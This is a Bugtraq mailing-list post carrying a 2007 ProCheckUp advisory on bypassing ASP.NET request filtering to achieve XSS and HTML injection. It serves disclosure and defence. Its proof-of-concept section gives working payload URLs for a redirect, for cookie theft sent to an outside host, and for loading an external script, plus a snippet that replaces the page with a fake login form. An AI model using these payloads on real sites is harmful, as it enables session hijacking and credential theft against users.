Microsoft .NET request filtering bypass vulnerability (BID 20753)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Microsoft .NET request filtering bypass vulnerability (BID 20753)
From: research@xxxxxxxxxxxxxx
Date: 5 Apr 2007 15:51:02 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

FYI,

The following are the technical details for the Microsoft .NET request 
filtering bypass vulnerability (BID 20753):


ProCheckUp Security Bulletin 

This advisory has been published following consultation with UK CPNI (formally 
known as NISCC) 

Title: Microsoft ASP.NET request filtering can be bypassed allowing XSS and 
HTML injection attacks


CERT: None


Date found: 7 July, 2006

The following client/server environment was tested and found vulnerable:

- Microsoft Windows Server 2003 Standard Edition Build 
3790.srv03_sp1_rtm.050324-1447 Service Pack 1
- Microsoft IIS 6.0
- Microsoft ASP .NET Framework Version 2.0.50727.42
- Microsoft Internet Explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519
- Microsoft Internet Explorer 7.0.5450.4 Beta 3
- Microsoft Internet Explorer 7.0.5730.11


Severity: Medium


Credits: request filtering bypass found by Richard Brain and further researched 
by Jan Fry and Adrian Pastor


Vendor Status: N/A


CVE Candidate: Not assigned


Description: 

By understanding how ASP .NET malicious request filtering functions, ProCheckUp 
has found that it is possible to bypass ASP .NET request filtering and perform 
XSS and HTML injection attacks.

It was possible to perform redirect, cookie theft, and unrestricted HTML 
injection attacks against an ASP .NET application setup in a test environment. 
ProCheckUp has also found this issue to be exploitable while carrying out 
penetration tests on several customer's live environments.


Notes:

In order to exploit this flaw, an attacker would need to target a .NET 
server-side application which does not sanitize input parameters properly 
before being returned back to the web browser.


Proof of concept:

In the following examples 'vuln-search.aspx' is a script that solely relies on 
ASP .NET request filtering, and returns user-supplied input back to the browser.

Alert box injection - simply provided for testing purposes (may cause DoS 
issues on Internet Explorer)
http://target/vuln-search.aspx?term=</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

Redirection Attack
http://target/vuln-search.aspx?term=</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com";)>

Cookie stealing
http://target/vuln-search.aspx?term=</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/cookiemonster.php?sid="%2bdocument.cookie)>

Unrestricted HTML injection from external '.js' file
http://target/vuln-search.aspx?term=</XSS/*-*/STYLE=xss:expression(myScript=document.body.appendChild(document.createElement("script")))></XSS/*-*/STYLE=xss:expression(myScript.setAttribute("src","http://attackerserver/xss.js";))>

where 'xss.js' could contain a snippet that overwrites the entire document's 
HTML body. i.e.: 

document.body.innerHTML = '<b>since we can now insert brakets without having to 
escape the request filtering, we\'re free to insert any HTML tags</b></br><form 
name="myform" action="http://www.procheckup.com";><input type="text" 
name="login"><br/><input type="password" name="password"></br><input 
type="submit" value="Login"></form>';myform.login.focus();


Consequences: 

Attackers can hijack user accounts through XSS and HTML injection attacks 
against vulnerable applications that solely rely on ASP .NET request filtering.


Fix:

Do not rely on ASP .NET filtering protection, sanitize all input parameters on 
server side applications. Follow a whitelisting approach when performing input 
filtering.


References: 

http://www.procheckup.com/Vulner_PR0703.php
http://www.securityfocus.com/bid/20753/
http://www.cpni.gov.uk/docs/re-20061020-00710.pdf
http://www.owasp.org/index.php/Category:OWASP_.NET_Project


Legal:

Copyright 2007 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet 
community for the purpose of alerting them to problems, if and only if, the 
Bulletin is not edited or changed in any way, is attributed to Procheckup, and 
provided such reproduction and/or distribution is performed for non-commercial 
purposes.

Any other use of this information is prohibited. Procheckup is not liable for 
any misuse  of this information by any third party.

Prev by Date: iDefense Security Advisory 04.04.07: Kaspersky Internet Security Suite klif.sys Heap Overflow Vulnerability
Next by Date: iDefense Security Advisory 04.04.07: ESRI ArcSDE Buffer Overflow Vulnerability
Previous by thread: iDefense Security Advisory 04.04.07: Kaspersky Internet Security Suite klif.sys Heap Overflow Vulnerability
Next by thread: iDefense Security Advisory 04.04.07: ESRI ArcSDE Buffer Overflow Vulnerability
Index(es):
- Date
- Thread